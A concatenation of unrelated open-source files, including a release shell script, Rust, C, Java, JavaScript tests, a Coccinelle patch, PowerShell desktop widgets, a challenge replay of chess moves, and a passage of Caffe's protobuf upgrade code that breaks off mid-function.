so we can safely assume this check is local & upstream branches. if [[ -z $(git branch | grep $release_branch_name) ]]; then git checkout -b $release_branch_name echo "Release branch made." else echo "Release branch $release_branch_name exists already." git checkout $release_branch_name fi echo "Now you'll need to cherry-pick any relevant git commits into this release branch." echo "Either pause this script with ctrl-z, or open a new terminal window and do the cherry-picking." if [[ $publish == "TRUE" ]]; then read -p "Press enter when you're done cherry-picking. THIS WILL MAKE A TAG PUSH THE BRANCH TO $remote" else read -p "Press enter when you're done cherry-picking." fi # TODO can/should we add a way to review the cherry-picked commits before the push? if [[ $publish == "TRUE" ]]; then echo "Pushing $release_branch_name to \"$remote\" remote" git push --set-upstream "$remote" $release_branch_name fi tag_and_push else echo "Checking out $remote/main." git checkout "$remote"/main tag_and_push fi echo "Invoking Goreleaser to create the GitHub release." RELEASE_NOTES_FILE=changelogs/CHANGELOG-$VELERO_MAJOR.$VELERO_MINOR.md \ PUBLISH=$publish \ make release if [[ $publish == "FALSE" ]]; then # Delete the local tag so we don't potentially conflict when it's re-run for real. # This also means we won't have to just ignore existing tags in tag_and_push, which could be a problem if there's an existing tag. echo "Dry run complete. Deleting git tag $VELERO_VERSION" git checkout $upstream_branch git tag -d $VELERO_VERSION fi
{ "pile_set_name": "Github" }
#![windows_subsystem = "windows"] //#[cfg(target_os = "windows")] fn main() -> Result<(), systray::Error> { let mut app; match systray::Application::new() { Ok(w) => app = w, Err(_) => panic!("Can't create window!"), } // w.set_icon_from_file(&"C:\\Users\\qdot\\code\\git-projects\\systray-rs\\resources\\rust.ico".to_string()); // w.set_tooltip(&"Whatever".to_string()); app.set_icon_from_file("/usr/share/gxkb/flags/ua.png")?; app.add_menu_item("Print a thing", |_| { println!("Printing a thing!"); Ok::<_, systray::Error>(()) })?; app.add_menu_item("Add Menu Item", |window| { window.add_menu_item("Interior item", |_| { println!("what"); Ok::<_, systray::Error>(()) })?; window.add_menu_separator()?; Ok::<_, systray::Error>(()) })?; app.add_menu_separator()?; app.add_menu_item("Quit", |window| { window.quit(); Ok::<_, systray::Error>(()) })?; println!("Waiting on message!"); app.wait_for_message()?; Ok(()) } // #[cfg(not(target_os = "windows"))] // fn main() { // panic!("Not implemented on this platform!"); // }
{ "pile_set_name": "Github" }
/** * \file os_rename.c * \brief Rename a path on Windows. * \author Copyright (c) 2002-2013 Jason Perkins and the Premake project */ #include "premake.h" #if PLATFORM_WINDOWS int os_rename(lua_State* L) { const char *fromname = luaL_checkstring(L, 1); const char *toname = luaL_checkstring(L, 2); wchar_t wide_frompath[PATH_MAX]; if (MultiByteToWideChar(CP_UTF8, 0, fromname, -1, wide_frompath, PATH_MAX) == 0) { lua_pushstring(L, "unable to encode source path"); return lua_error(L); } wchar_t wide_topath[PATH_MAX]; if (MultiByteToWideChar(CP_UTF8, 0, toname, -1, wide_topath, PATH_MAX) == 0) { lua_pushstring(L, "unable to encode dest path"); return lua_error(L); } if (MoveFileExW(wide_frompath, wide_topath, MOVEFILE_COPY_ALLOWED)) { lua_pushboolean(L, 1); return 1; } else { DWORD err = GetLastError(); char unicodeErr[512]; LPWSTR messageBuffer = NULL; if (FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, err, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR) &messageBuffer, 0, NULL) != 0) { if (WideCharToMultiByte(CP_UTF8, 0, messageBuffer, -1, unicodeErr, sizeof(unicodeErr), NULL, NULL) == 0) strcpy(unicodeErr, "failed to translate error message"); LocalFree(messageBuffer); } else strcpy(unicodeErr, "failed to get error message"); lua_pushnil(L); lua_pushfstring(L, "%s: %s", fromname, unicodeErr); lua_pushinteger(L, err); return 3; } } #endif
{ "pile_set_name": "Github" }
/* Any copyright is dedicated to the Public Domain. * http://creativecommons.org/publicdomain/zero/1.0/ */ const KEY_PROFILEDIR = "ProfD"; const KEY_APPDIR = "XCurProcD"; const FILE_BLOCKLIST = "blocklist.xml"; const PREF_BLOCKLIST_ENABLED = "extensions.blocklist.enabled"; const OLD = do_get_file("data/test_overrideblocklist/old.xml"); const NEW = do_get_file("data/test_overrideblocklist/new.xml"); const ANCIENT = do_get_file("data/test_overrideblocklist/ancient.xml"); const OLD_TSTAMP = 1296046918000; const NEW_TSTAMP = 1396046918000; const gAppDir = FileUtils.getFile(KEY_APPDIR, []); let oldAddon = { id: "[email protected]", version: 1 } let newAddon = { id: "[email protected]", version: 1 } let ancientAddon = { id: "[email protected]", version: 1 } let invalidAddon = { id: "[email protected]", version: 1 } function incrementAppVersion() { gAppInfo.version = "" + (parseInt(gAppInfo.version) + 1); } function clearBlocklists() { let blocklist = FileUtils.getFile(KEY_APPDIR, [FILE_BLOCKLIST]); if (blocklist.exists()) blocklist.remove(true); blocklist = FileUtils.getFile(KEY_PROFILEDIR, [FILE_BLOCKLIST]); if (blocklist.exists()) blocklist.remove(true); } function reloadBlocklist() { Services.prefs.setBoolPref(PREF_BLOCKLIST_ENABLED, false); Services.prefs.setBoolPref(PREF_BLOCKLIST_ENABLED, true); } function copyToApp(file) { file.clone().copyTo(gAppDir, FILE_BLOCKLIST); } function copyToProfile(file, tstamp) { file = file.clone(); file.copyTo(gProfD, FILE_BLOCKLIST); file = gProfD.clone(); file.append(FILE_BLOCKLIST); file.lastModifiedTime = tstamp; } function run_test() { createAppInfo("[email protected]", "XPCShell", "1", "1"); let appBlocklist = FileUtils.getFile(KEY_APPDIR, [FILE_BLOCKLIST]); if (appBlocklist.exists()) { try { appBlocklist.moveTo(gAppDir, "blocklist.old"); } catch (e) { todo(false, "Aborting test due to unmovable blocklist file: " + e); return; } do_register_cleanup(function() { clearBlocklists(); appBlocklist.moveTo(gAppDir, FILE_BLOCKLIST); }); } run_next_test(); } // On first run whataver is in the app dir should get copied to the profile add_test(function test_copy() { clearBlocklists(); copyToApp(OLD); incrementAppVersion(); startupManager(); reloadBlocklist(); let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"]. getService(AM_Ci.nsIBlocklistService); do_check_false(blocklist.isAddonBlocklisted(invalidAddon)); do_check_false(blocklist.isAddonBlocklisted(ancientAddon)); do_check_true(blocklist.isAddonBlocklisted(oldAddon)); do_check_false(blocklist.isAddonBlocklisted(newAddon)); shutdownManager(); run_next_test(); }); // An ancient blocklist should be ignored add_test(function test_ancient() { clearBlocklists(); copyToApp(ANCIENT); copyToProfile(OLD, OLD_TSTAMP); incrementAppVersion(); startupManager(); reloadBlocklist(); let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"]. getService(AM_Ci.nsIBlocklistService); do_check_false(blocklist.isAddonBlocklisted(invalidAddon)); do_check_false(blocklist.isAddonBlocklisted(ancientAddon)); do_check_true(blocklist.isAddonBlocklisted(oldAddon)); do_check_false(blocklist.isAddonBlocklisted(newAddon)); shutdownManager(); run_next_test(); }); // A new blocklist should override an old blocklist add_test(function test_override() { clearBlocklists(); copyToApp(NEW); copyToProfile(OLD, OLD_TSTAMP); incrementAppVersion(); startupManager(); reloadBlocklist(); let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"]. getService(AM_Ci.nsIBlocklistService); do_check_false(blocklist.isAddonBlocklisted(invalidAddon)); do_check_false(blocklist.isAddonBlocklisted(ancientAddon)); do_check_false(blocklist.isAddonBlocklisted(oldAddon)); do_check_true(blocklist.isAddonBlocklisted(newAddon)); shutdownManager(); run_next_test(); }); // An old blocklist shouldn't override a new blocklist add_test(function test_retain() { clearBlocklists(); copyToApp(OLD); copyToProfile(NEW, NEW_TSTAMP); incrementAppVersion(); startupManager(); reloadBlocklist(); let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"]. getService(AM_Ci.nsIBlocklistService); do_check_false(blocklist.isAddonBlocklisted(invalidAddon)); do_check_false(blocklist.isAddonBlocklisted(ancientAddon)); do_check_false(blocklist.isAddonBlocklisted(oldAddon)); do_check_true(blocklist.isAddonBlocklisted(newAddon)); shutdownManager(); run_next_test(); }); // A missing blocklist in the profile should still load an app-shipped blocklist add_test(function test_missing() { clearBlocklists(); copyToApp(OLD); copyToProfile(NEW, NEW_TSTAMP); incrementAppVersion(); startupManager(); shutdownManager(); let blocklist = FileUtils.getFile(KEY_PROFILEDIR, [FILE_BLOCKLIST]); blocklist.remove(true); startupManager(false); reloadBlocklist(); let blocklist = AM_Cc["@mozilla.org/extensions/blocklist;1"]. getService(AM_Ci.nsIBlocklistService); do_check_false(blocklist.isAddonBlocklisted(invalidAddon)); do_check_false(blocklist.isAddonBlocklisted(ancientAddon)); do_check_true(blocklist.isAddonBlocklisted(oldAddon)); do_check_false(blocklist.isAddonBlocklisted(newAddon)); shutdownManager(); run_next_test(); });
{ "pile_set_name": "Github" }
/* * super.h */ int befs_load_sb(struct super_block *sb, befs_super_block *disk_sb); int befs_check_sb(struct super_block *sb);
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0 /// Make sure (of/i2c/platform)_device_id tables are NULL terminated // // Keywords: of_table i2c_table platform_table // Confidence: Medium // Options: --include-headers virtual patch virtual context virtual org virtual report @depends on context@ identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, * } }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., * { ..., E, ... }, }; ) @depends on patch@ identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, - } + }, + { } }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { ..., E, ... }, + { }, }; ) @r depends on org || report@ position p1; identifier var, arr; expression E; @@ ( struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { .var = E, } @p1 }; | struct \(of_device_id \| i2c_device_id \| platform_device_id\) arr[] = { ..., { ..., E, ... } @p1 }; ) @script:python depends on org@ p1 << r.p1; arr << r.arr; @@ cocci.print_main(arr,p1) @script:python depends on report@ p1 << r.p1; arr << r.arr; @@ msg = "%s is not NULL terminated at line %s" % (arr, p1[0].line) coccilib.report.print_report(p1[0],msg)
{ "pile_set_name": "Github" }
/* * SPDX-License-Identifier: Apache-2.0 * * Copyright 2008-2020 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.codehaus.griffon.runtime.javafx.groovy; import griffon.annotations.inject.DependsOn; import griffon.builder.javafx.JavafxBuilderCustomizer; import griffon.core.injection.Module; import griffon.javafx.JavaFXWindowDisplayHandler; import griffon.util.groovy.BuilderCustomizer; import org.codehaus.griffon.runtime.core.injection.AbstractModule; import org.kordamp.jipsy.ServiceProviderFor; import javax.inject.Named; import static griffon.util.AnnotationUtils.named; /** * @author Andres Almiray */ @ServiceProviderFor(Module.class) @DependsOn("javafx") @Named("javafx-groovy") public class JavafxBuilderModule extends AbstractModule { @Override protected void doConfigure() { // tag::bindings[] bind(BuilderCustomizer.class) .to(JavafxBuilderCustomizer.class) .asSingleton(); bind(JavaFXWindowDisplayHandler.class) .withClassifier(named("windowDisplayHandler")) .to(GroovyAwareConfigurableJavaFXWindowDisplayHandler.class) .asSingleton(); // end::bindings[] } }
{ "pile_set_name": "Github" }
## A really fancy clock Import-Module ShowUI -FOrce New-UIWidget -AsJob -Content { $shadow = DropShadowEffect -Color Black -Shadow 0 -Blur 8 $now = Get-Date; StackPanel { TextBlock -Name "Time" ('{0:h:mm tt}' -f $now) -FontSize 108 -LineHeight 100 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Effect $shadow -FontFamily "Century Gothic" StackPanel -Orientation Horizontal { TextBlock -Name "Day" ('{0:dd}' -f $now) -FontSize 80 -LineHeight 80 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Opacity 0.6 -Effect $shadow -FontFamily "Century Gothic" StackPanel { TextBlock -Name "Month" ('{0:MMMM}' -f $now).ToUpper() -fontsize 40 -LineHeight 40 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -FontFamily "Century Gothic" TextBlock -Name "Weekday" ('{0:dddd}' -f $now).ToUpper() -fontsize 28 -LineHeight 28 -LineStackingStrategy BlockLineHeight -Margin 0 -Padding 0 -Foreground White -Effect $shadow -FontFamily "Century Gothic" } -Margin 0 } -Margin 0 } -Margin 0 } -Interval "0:0:0.2" -UpdateBlock { $now = Get-Date $Time.Text = '{0:h:mm tt}' -f $now $Day.Text = '{0:dd}' -f $now $Month.Text = ('{0:MMMM}' -f $now).ToUpper() $Weekday.Text = ('{0:dddd}' -f $now).ToUpper() } ## And a slick weather widget using Yahoo's forecast and images New-UIWidget -AsJob { Grid { Rectangle -RadiusX 10 -RadiusY 10 -StrokeThickness 0 -Width 170 -Height 80 -HorizontalAlignment Left -VerticalAlignment Top -Margin "60,40,0,0" -Fill { LinearGradientBrush -Start "0.5,0" -End "0.5,1" -Gradient { GradientStop -Color "#FF007bff" -Offset 0 GradientStop -Color "#FF40d6ff" -Offset 1 } } Image -Name Image -Stretch Uniform -Width 250.0 -Height 180.0 -Source "http://l.yimg.com/a/i/us/nws/weather/gr/31d.png" TextBlock -Name Temp -Text "99°" -FontSize 80 -Foreground White -Margin "130,0,0,0" -Effect { DropShadowEffect -Color Black -Shadow 0 -Blur 8 } TextBlock -Name Forecast -Text "Forecast" -FontSize 12 -Foreground White -Margin "120,95,0,0" } } -Refresh "00:10" { # To find your WOEID, browse or search for your city from the Weather home page. # The WOEID is the LAST PART OF the URL for the forecast page for that city. $woEID = 14586 $channel = ([xml](New-Object Net.WebClient).DownloadString("http://weather.yahooapis.com/forecastrss?p=$woEID")).rss.channel $h = ([int](Get-Date -f hh)) if($h -gt ([DateTime]$channel.astronomy.sunrise).Hour -and $h -lt ([DateTime]$channel.astronomy.sunset).Hour) { $dayOrNight = 'd' } else { $dayOrNight = 'n' } $source = "http`://l.yimg.com/a/i/us/nws/weather/gr/{0}{1}.png" -f $channel.item.condition.code, $dayOrNight $Image.Source = $source $Temp.Text = $channel.item.condition.temp + [char]176 $Forecast.Text = "High: {0}{2} Low: {1}{2}" -f $channel.item.forecast[0].high, $channel.item.forecast[0].low, [char]176 } ## An analog clock with "hands" and an old-school ticking motion. New-UIWidget -AsJob -Content { $shadow = DropShadowEffect -Color Black -Shadow 0 -Blur 8 Grid { Ellipse -Fill Transparent -Stroke Black -StrokeThickness 4 -Width 300 -Height 300 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 6 -Width 290 -Height 290 -StrokeDashArray 1,11.406 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 10 -Width 280 -Height 280 -StrokeDashArray 64.25 Ellipse -Fill Transparent -Stroke Black -StrokeThickness 5 -Width 255 -Height 255 -StrokeDashArray 60,59 Ellipse -Name Hour -Fill Transparent -Stroke White -StrokeThickness 100 -Width 255 -Height 255 -StrokeDashArray 0.04,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow Ellipse -Name Minute -Fill Transparent -Stroke '#FFC0B7B7' -StrokeThickness 100 -Width 275 -Height 275 -StrokeDashArray 0.05,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow Ellipse -Name Second -Fill Transparent -Stroke '#FF31C2FF' -StrokeThickness 100 -Width 215 -Height 215 -StrokeDashArray 0.02,300 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } -Effect $shadow } } -Refresh "00:00:00.2" -Update { $now = Get-Date $deg = (1/60) * 360 $Hour.RenderTransform.Angle = $now.Hour * 5 * $deg -90 $Minute.RenderTransform.Angle = $now.Minute * $deg -90 $Second.RenderTransform.Angle = $now.Second * $deg -90 } ## A variation on the target clock, without the smooth animated "quartz movement" New-UIWidget { Grid { $shadow = DropShadowEffect -ShadowDepth 0 -BlurRadius 5 -Direction 0 Ellipse -Name Hour -Fill Transparent -Stroke Black -StrokeThickness 100 -Width 350 -Height 350 -StrokeDashArray 7.85,7.85 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } Ellipse -Name Minute -Fill Transparent -Stroke Gray -StrokeThickness 75 -Width 325 -Height 325 -StrokeDashArray 10.468,10.468 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } Ellipse -Name Second -Fill Transparent -Stroke White -StrokeThickness 50 -Width 300 -Height 300 -StrokeDashArray 15.71,15.71 -RenderTransformOrigin "0.5,0.5" -RenderTransform { RotateTransform -Angle -90 } } } -Refresh "00:00:00.2" { $now = Get-Date $Hour.StrokeDashArray[0] = $Hour.StrokeDashArray[1]/60 * $now.Hour * 5 $Minute.StrokeDashArray[0] = $Minute.StrokeDashArray[1]/60 * $now.Minute $Second.StrokeDashArray[0] = $Second.StrokeDashArray[1]/60 * $now.Second } # New-BootsGadget { # label "hh:mm" -fontsize 24 -Effect {DropShadowEffect -Color White -Shadow 0 -Blur 8} # } -Refresh "00:00:00.5" { # $this.Tag.Content.Content = Get-Date -f 'h:mm' # } -Title "Clock" -Topmost
{ "pile_set_name": "Github" }
package com.tencent.mm.plugin.exdevice.service; import com.tencent.matrix.trace.core.AppMethodBeat; import com.tencent.mm.plugin.exdevice.j.b; import com.tencent.mm.plugin.exdevice.service.k.a; import com.tencent.mm.sdk.platformtools.ab; public class w extends a { public void a(long j, int i, int i2, int i3, long j2) { AppMethodBeat.i(19632); ab.i("MicroMsg.exdevice.OnStateChangeCallBack", "onStateChange, deviceId = %s, oldSate = %d, newState = %d, errCode = %d, profileType = %d", b.ie(j), Integer.valueOf(i), Integer.valueOf(i2), Integer.valueOf(i3), Long.valueOf(j2)); AppMethodBeat.o(19632); } }
{ "pile_set_name": "Github" }
--[[============================================================================ main.lua ============================================================================]]-- --[[-- # xRules xRules lets you rewrite and transform incoming MIDI/OSC messages on-the-fly, using a visual programming interface. Outgoing messages can be routed into Renoise, or passed on to external devices. ## Links Renoise: [Tool page](http://www.renoise.com/tools/xrules/) Renoise Forum: [Feedback and bugs](http://forum.renoise.com/index.php/topic/47224-new-tool-31-xrules/) Github: [Documentation and source](https://github.com/renoise/xrnx/blob/master/Tools/com.renoise.xRules.xrnx/) --]] --============================================================================== _trace_filters = nil --_trace_filters = {".*"} --_trace_filters = {"^xRule*"} _clibroot = "source/cLib/classes/" _xlibroot = "source/xLib/classes/" _vlibroot = "source/vLib/classes/" _vlib_img = _vlibroot .. "images/" require (_clibroot.."cLib") require (_clibroot.."cDebug") require (_clibroot.."cFilesystem") require (_clibroot.."cDocument") require (_clibroot.."cSandbox") require (_clibroot.."cReflection") require (_clibroot.."cObservable") require (_clibroot.."cPreferences") require (_clibroot.."cParseXML") require (_clibroot.."cString") cLib.require (_xlibroot.."xLib") cLib.require (_xlibroot.."xAudioDevice") cLib.require (_xlibroot.."xAutomation") cLib.require (_xlibroot.."xMessage") cLib.require (_xlibroot.."xValue") cLib.require (_xlibroot.."xMidiMessage") cLib.require (_xlibroot.."xMidiInput") cLib.require (_xlibroot.."xOscRouter") cLib.require (_xlibroot.."xOscPattern") cLib.require (_xlibroot.."xOscMessage") cLib.require (_xlibroot.."xOscValue") cLib.require (_xlibroot.."xOscClient") cLib.require (_xlibroot.."xOscDevice") cLib.require (_xlibroot.."xNoteColumn") cLib.require (_xlibroot.."xTrack") cLib.require (_xlibroot.."xTransport") cLib.require (_xlibroot.."xBlockLoop") cLib.require (_xlibroot.."xSongPos") cLib.require (_xlibroot.."xPlayPos") cLib.require (_xlibroot.."xParameter") cLib.require (_xlibroot.."xPhraseManager") cLib.require (_xlibroot.."xRule") cLib.require (_xlibroot.."xRuleset") cLib.require (_xlibroot.."xRules") cLib.require (_xlibroot.."xScale") require (_vlibroot.."vLib") require (_vlibroot.."vTable") require (_vlibroot.."vLogView") require (_vlibroot.."vPrompt") require (_vlibroot.."vDialog") require (_vlibroot.."vArrowButton") require (_vlibroot.."vDialogWizard") require (_vlibroot.."vFileBrowser") --require (_vlibroot.."helpers/vVector") require "source/xRulesApp" require "source/xRulesAppPrefs" require "source/xRulesUI" require "source/xRulesUIAction" require "source/xRulesUICondition" require "source/xRulesUIEditor" require "source/xRulesAppDialogCreate" require "source/xRulesAppDialogExport" require "source/xRulesAppDialogPrefs" require "source/xRulesAppDialogHelp" -------------------------------------------------------------------------------- -- main -------------------------------------------------------------------------------- rns = nil app = nil -- pre-launch configuration local preferences = xRulesAppPrefs() --renoise.tool().preferences = preferences local cprefs = cPreferences{ tool_name = "xRules", doc_class_name = "xRulesAppPrefs", } local launch_with_profile = function(doc) renoise.tool().preferences = doc app = xRulesApp(cprefs) end local show_dialog = function() if app then app:show_dialog() else cprefs.launch_callback = function(doc) launch_with_profile(doc) app:show_dialog() end cprefs.default_callback = function() renoise.tool().preferences = preferences app = xRulesApp(cprefs) app:show_dialog() end cprefs:attempt_launch() end end local launch = function() if app then app:launch() else cprefs.launch_callback = function(doc) --print(">>> launch_callback (launch)...") launch_with_profile(doc) app:launch() end cprefs.default_callback = function() renoise.tool().preferences = preferences app = xRulesApp(cprefs) app:launch() end cprefs:attempt_launch() end end -------------------------------------------------------------------------------- -- menu entries -------------------------------------------------------------------------------- renoise.tool():add_menu_entry { name = "Main Menu:Tools:xRules", invoke = function() show_dialog() end } -------------------------------------------------------------------------------- -- keybindings -------------------------------------------------------------------------------- renoise.tool():add_keybinding { name = "Global:xRules:Show Dialog...", invoke = function(repeated) if (not repeated) then app:show_dialog() end end } -------------------------------------------------------------------------------- -- notifications -------------------------------------------------------------------------------- -- show/run application once renoise is ready -- (workaround for http://goo.gl/UnSDnw) local waiting_to_show_dialog = true local function app_idle_notifier() if waiting_to_show_dialog and renoise.song() then rns = renoise.song() waiting_to_show_dialog = false if preferences.autorun_enabled.value then launch() end if preferences.show_on_startup.value then show_dialog() end renoise.tool().app_idle_observable:remove_notifier(app_idle_notifier) end end renoise.tool().app_idle_observable:add_notifier(app_idle_notifier) renoise.tool().app_new_document_observable:add_notifier(function() --print(">>> app_new_document_observable fired...",rns,renoise.song()) rns = renoise.song() end) renoise.tool().app_release_document_observable:add_notifier(function() --print(">>> app_release_document_observable fired...",rns,renoise.song()) rns = renoise.song() end)
{ "pile_set_name": "Github" }
<?xml version="1.0" standalone="no" ?> <!DOCTYPE pov SYSTEM "/usr/share/cgc-docs/replay.dtd"> <pov> <cbid>service</cbid> <replay> <write><data>new\x0a</data></write> <write><data>sd 1\x0a</data></write> <write><data>s1r3\x0a</data></write> <read><delim>\x0a</delim><match><data>move p7p5\x0a</data></match></read> <write><data>t1s1\x0a</data></write> <read><delim>\x0a</delim><match><data>move p8p6\x0a</data></match></read> <write><data>r3p4\x0a</data></write> <read><delim>\x0a</delim><match><data>move p6t2\x0a</data></match></read> <write><data>p4r3\x0a</data></write> <read><delim>\x0a</delim><match><data>move t2r4\x0a</data></match></read> <write><data>s2s4\x0a</data></write> <read><delim>\x0a</delim><match><data>move o8s4\x0a</data></match></read> <write><data>sd 1\x0a</data></write> <write><data>s1s3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r4o4\x0a</data></match></read> <write><data>s3s1\x0a</data></write> <read><delim>\x0a</delim><match><data>move s4r3\x0a</data></match></read> <write><data>s1s7\x0a</data></write> <read><delim>\x0a</delim><match><data>move r8s7\x0a</data></match></read> <write><data>n1o3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r3s4\x0a</data></match></read> <write><data>o3m4\x0a</data></write> <read><delim>\x0a</delim><match><data>move o4m4\x0a</data></match></read> <write><data>r1t3\x0a</data></write> <read><delim>\x0a</delim><match><data>move s4t3\x0a</data></match></read> <write><data>r2r4\x0a</data></write> <read><delim>\x0a</delim><match><data>move m4r4\x0a</data></match></read> <write><data>p2p3\x0a</data></write> <read><delim>\x0a</delim><match><data>move r4s3\x0a</data></match></read> <write><data>q1p2\x0a</data></write> <read><delim>\x0a</delim><match><data>move n8m6\x0a</data></match></read> <write><data>p1q1\x0a</data></write> <read><delim>\x0a</delim><match><data>move s7q5\x0a</data></match></read> <write><data>quit\x0a</data></write> <read><delim>\x0a</delim><match><data>bye\x0a</data></match></read> </replay> </pov>
{ "pile_set_name": "Github" }
export * from './tabs.module'; export * from './tabs.service'; export * from './tab-list.component'; export * from './tab/tab-panel.component'; export * from './tab-item/tab-item.directive'; export * from './tab-link/tab-link.directive'; export * from './tab-nav/tab-nav.component'; export * from './tab-utils/tab-directives';
{ "pile_set_name": "Github" }
package org.apache.helix.manager.zk.client; /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ /** * Deprecated; please use DedicatedZkClientFactory in zookeeper-api instead. * * Singleton factory that build dedicated clients using the raw ZkClient. */ @Deprecated public class DedicatedZkClientFactory extends org.apache.helix.zookeeper.impl.factory.DedicatedZkClientFactory { }
{ "pile_set_name": "Github" }
#include <google/protobuf/io/coded_stream.h> #include <google/protobuf/io/zero_copy_stream_impl.h> #include <google/protobuf/text_format.h> #include <boost/filesystem.hpp> #include <map> #include <string> #include "caffe/common.hpp" #include "caffe/proto/caffe.pb.h" #include "caffe/util/io.hpp" #include "caffe/util/upgrade_proto.hpp" namespace caffe { bool NetNeedsUpgrade(const NetParameter& net_param) { return NetNeedsV0ToV1Upgrade(net_param) || NetNeedsV1ToV2Upgrade(net_param) || NetNeedsDataUpgrade(net_param) || NetNeedsInputUpgrade(net_param) || NetNeedsBatchNormUpgrade(net_param); } bool UpgradeNetAsNeeded(const string& param_file, NetParameter* param) { bool success = true; if (NetNeedsV0ToV1Upgrade(*param)) { // NetParameter was specified using the old style (V0LayerParameter); try to // upgrade it. LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "V0LayerParameter: " << param_file; NetParameter original_param(*param); if (!UpgradeV0Net(original_param, param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "V0NetParameter to NetParameter (see above); continuing anyway."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "V0LayerParameter"; } LOG(WARNING) << "Note that future Caffe releases will not support " << "V0NetParameter; use ./build/tools/upgrade_net_proto_text for " << "prototxt and ./build/tools/upgrade_net_proto_binary for model " << "weights upgrade this and any other net protos to the new format."; } // NetParameter uses old style data transformation fields; try to upgrade it. if (NetNeedsDataUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "transformation parameters: " << param_file; UpgradeNetDataTransformation(param); LOG(INFO) << "Successfully upgraded file specified using deprecated " << "data transformation parameters."; LOG(WARNING) << "Note that future Caffe releases will only support " << "transform_param messages for transformation fields."; } if (NetNeedsV1ToV2Upgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "V1LayerParameter: " << param_file; NetParameter original_param(*param); if (!UpgradeV1Net(original_param, param)) { success = false; LOG(ERROR) << "Warning: had one or more problems upgrading " << "V1LayerParameter (see above); continuing anyway."; } else { LOG(INFO) << "Successfully upgraded file specified using deprecated " << "V1LayerParameter"; } } // NetParameter uses old style input fields; try to upgrade it. if (NetNeedsInputUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade input file specified using deprecated " << "input fields: " << param_file; UpgradeNetInput(param); LOG(INFO) << "Successfully upgraded file specified using deprecated " << "input fields."; LOG(WARNING) << "Note that future Caffe releases will only support " << "input layers and not input fields."; } // NetParameter uses old style batch norm layers; try to upgrade it. if (NetNeedsBatchNormUpgrade(*param)) { LOG(INFO) << "Attempting to upgrade batch norm layers using deprecated " << "params: " << param_file; UpgradeNetBatchNorm(param); LOG(INFO) << "Successfully upgraded batch norm layers using deprecated " << "params."; } return success; } void ReadNetParamsFromTextFileOrDie(const string& param_file, NetParameter* param) { CHECK(ReadProtoFromTextFile(param_file, param)) << "Failed to parse NetParameter file: " << param_file; UpgradeNetAsNeeded(param_file, param); } void ReadNetParamsFromBinaryFileOrDie(const string& param_file, NetParameter* param) { CHECK(ReadProtoFromBinaryFile(param_file, param)) << "Failed to parse NetParameter file: " << param_file; UpgradeNetAsNeeded(param_file, param); } bool NetNeedsV0ToV1Upgrade(const NetParameter& net_param) { for (int i = 0; i < net_param.layers_size(); ++i) { if (net_param.layers(i).has_layer()) { return true; } } return false; } bool NetNeedsV1ToV2Upgrade(const NetParameter& net_param) { return net_param.layers_size() > 0; } bool UpgradeV0Net(const NetParameter& v0_net_param_padding_layers, NetParameter* net_param) { // First upgrade padding layers to padded conv layers. NetParameter v0_net_param; UpgradeV0PaddingLayers(v0_net_param_padding_layers, &v0_net_param); // Now upgrade layer parameters. bool is_fully_compatible = true; net_param->Clear(); if (v0_net_param.has_name()) { net_param->set_name(v0_net_param.name()); } for (int i = 0; i < v0_net_param.layers_size(); ++i) { is_fully_compatible &= UpgradeV0LayerParameter(v0_net_param.layers(i), net_param->add_layers()); } for (int i = 0; i < v0_net_param.input_size(); ++i) { net_param->add_input(v0_net_param.input(i)); } for (int i = 0; i < v0_net_param.input_dim_size(); ++i) { net_param->add_input_dim(v0_net_param.input_dim(i)); } if 